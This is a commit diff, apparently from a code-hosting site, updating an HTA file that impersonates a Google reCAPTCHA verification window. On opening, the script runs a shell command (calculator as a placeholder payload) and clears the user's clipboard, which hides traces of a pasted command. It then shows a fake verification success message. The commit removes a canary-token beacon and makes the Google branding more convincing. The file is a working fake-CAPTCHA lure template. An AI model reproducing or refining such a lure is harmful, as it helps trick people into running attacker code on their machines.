enotkrutoy commited on
Commit
ff4f529
·
verified ·
1 Parent(s): 9b74d8b

Update verify

Browse files
Files changed (1) hide show
  1. verify +5 -11
verify CHANGED
@@ -6,7 +6,7 @@
6
  APPLICATIONNAME="reCAPTCHA Verification"
7
  BORDER="thin"
8
  BORDERSTYLE="normal"
9
- ICON="https://support.google.com/favicon.ico"
10
  SHOWINTASKBAR="yes"
11
  SINGLEINSTANCE="yes"
12
  WINDOWSTATE="normal"
@@ -53,8 +53,7 @@
53
  Window.MoveTo (Screen.Width - 300) / 2, (Screen.Height - 400) / 2
54
 
55
  Set objShell = CreateObject("WScript.Shell")
56
- objShell.Run "calc"
57
-
58
 
59
  ClearClipboard
60
 
@@ -62,32 +61,27 @@
62
  Call HideConnectingShowError
63
  objShell.Run "timeout /T 1 /nobreak", 0, True
64
  End Sub
 
65
  Sub HideConnectingShowError
66
  document.getElementById("connecting").style.display = "none"
67
  document.getElementById("error").style.display = "block"
68
  End Sub
 
69
  Sub ClearClipboard
70
  Dim objHTML
71
  Set objHTML = CreateObject("htmlfile")
72
  objHTML.parentWindow.clipboardData.setData "text", ""
73
  Set objHTML = Nothing
74
  End Sub
75
- Sub SendCanaryToken
76
- Dim xhr
77
- Set xhr = CreateObject("MSXML2.XMLHTTP")
78
- xhr.open "GET", "http://canarytokens.com/articles/static/about//contact.php", False
79
- xhr.send
80
- End Sub
81
  </script>
82
  </head>
83
  <body>
84
- <img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" alt="reCAPTCHA Logo">
85
  <div id="connecting" style="display:block;">
86
  <p>Verifying reCAPTCHA, please wait...</p>
87
  </div>
88
  <div id="error" style="display:none;">
89
  <p><b>Successful reCAPTCHA Verification!</b><br></p>
90
- // <p><b>Failed to connect with the reCAPTCHA server.</b><br>Try the verification steps again.</p>
91
  </div>
92
  <p class="terms">
93
  <a href="https://www.google.com/intl/en/policies/privacy/">Privacy</a> -
 
6
  APPLICATIONNAME="reCAPTCHA Verification"
7
  BORDER="thin"
8
  BORDERSTYLE="normal"
9
+ ICON="https://www.google.com/favicon.ico"
10
  SHOWINTASKBAR="yes"
11
  SINGLEINSTANCE="yes"
12
  WINDOWSTATE="normal"
 
53
  Window.MoveTo (Screen.Width - 300) / 2, (Screen.Height - 400) / 2
54
 
55
  Set objShell = CreateObject("WScript.Shell")
56
+ objShell.Run "calc"
 
57
 
58
  ClearClipboard
59
 
 
61
  Call HideConnectingShowError
62
  objShell.Run "timeout /T 1 /nobreak", 0, True
63
  End Sub
64
+
65
  Sub HideConnectingShowError
66
  document.getElementById("connecting").style.display = "none"
67
  document.getElementById("error").style.display = "block"
68
  End Sub
69
+
70
  Sub ClearClipboard
71
  Dim objHTML
72
  Set objHTML = CreateObject("htmlfile")
73
  objHTML.parentWindow.clipboardData.setData "text", ""
74
  Set objHTML = Nothing
75
  End Sub
 
 
 
 
 
 
76
  </script>
77
  </head>
78
  <body>
79
+ <img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="reCAPTCHA Logo">
80
  <div id="connecting" style="display:block;">
81
  <p>Verifying reCAPTCHA, please wait...</p>
82
  </div>
83
  <div id="error" style="display:none;">
84
  <p><b>Successful reCAPTCHA Verification!</b><br></p>
 
85
  </div>
86
  <p class="terms">
87
  <a href="https://www.google.com/intl/en/policies/privacy/">Privacy</a> -